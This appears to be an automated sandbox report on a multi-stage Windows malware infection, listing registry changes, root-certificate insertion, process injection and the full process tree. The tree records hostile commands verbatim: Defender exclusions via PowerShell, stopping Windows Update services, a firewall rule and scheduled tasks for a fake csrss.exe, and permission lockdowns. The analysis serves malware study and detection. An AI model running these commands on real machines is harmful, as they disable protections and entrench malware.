Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-492 = "India Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0267ce68c02da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E4AB.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E91F.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CE77.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\CD8C.exe

C:\Users\Admin\AppData\Local\Temp\CD8C.exe

C:\Users\Admin\AppData\Local\Temp\CE77.exe

C:\Users\Admin\AppData\Local\Temp\CE77.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CF91.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\D32A.exe

C:\Users\Admin\AppData\Local\Temp\D32A.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\D50F.exe

C:\Users\Admin\AppData\Local\Temp\D50F.exe

C:\Users\Admin\AppData\Local\Temp\D6C4.exe

C:\Users\Admin\AppData\Local\Temp\D6C4.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\DFDA.exe

C:\Users\Admin\AppData\Local\Temp\DFDA.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 524

C:\Users\Admin\AppData\Local\Temp\E4AB.exe

C:\Users\Admin\AppData\Local\Temp\E4AB.exe

C:\Users\Admin\AppData\Local\Temp\E91F.exe

C:\Users\Admin\AppData\Local\Temp\E91F.exe

C:\Users\Admin\AppData\Local\Temp\F2E0.exe

C:\Users\Admin\AppData\Local\Temp\F2E0.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {C82DC1E7-C63B-4FE3-AF45-DE7ACE8C042E} S-1-5-21-3750544865-3773649541-1858556521-1000:XOCYHKRS\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\13E8.exe

C:\Users\Admin\AppData\Local\Temp\13E8.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1A9D.exe

C:\Users\Admin\AppData\Local\Temp\1A9D.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\27C8.exe

C:\Users\Admin\AppData\Local\Temp\27C8.exe

C:\Users\Admin\AppData\Local\Temp\30CE.exe

C:\Users\Admin\AppData\Local\Temp\30CE.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231019130416.log C:\Windows\Logs\CBS\CbsPersist_20231019130416.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-851625528378964995-1319485058-1393911370-1469447064-1391892573-942200619-761350816"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

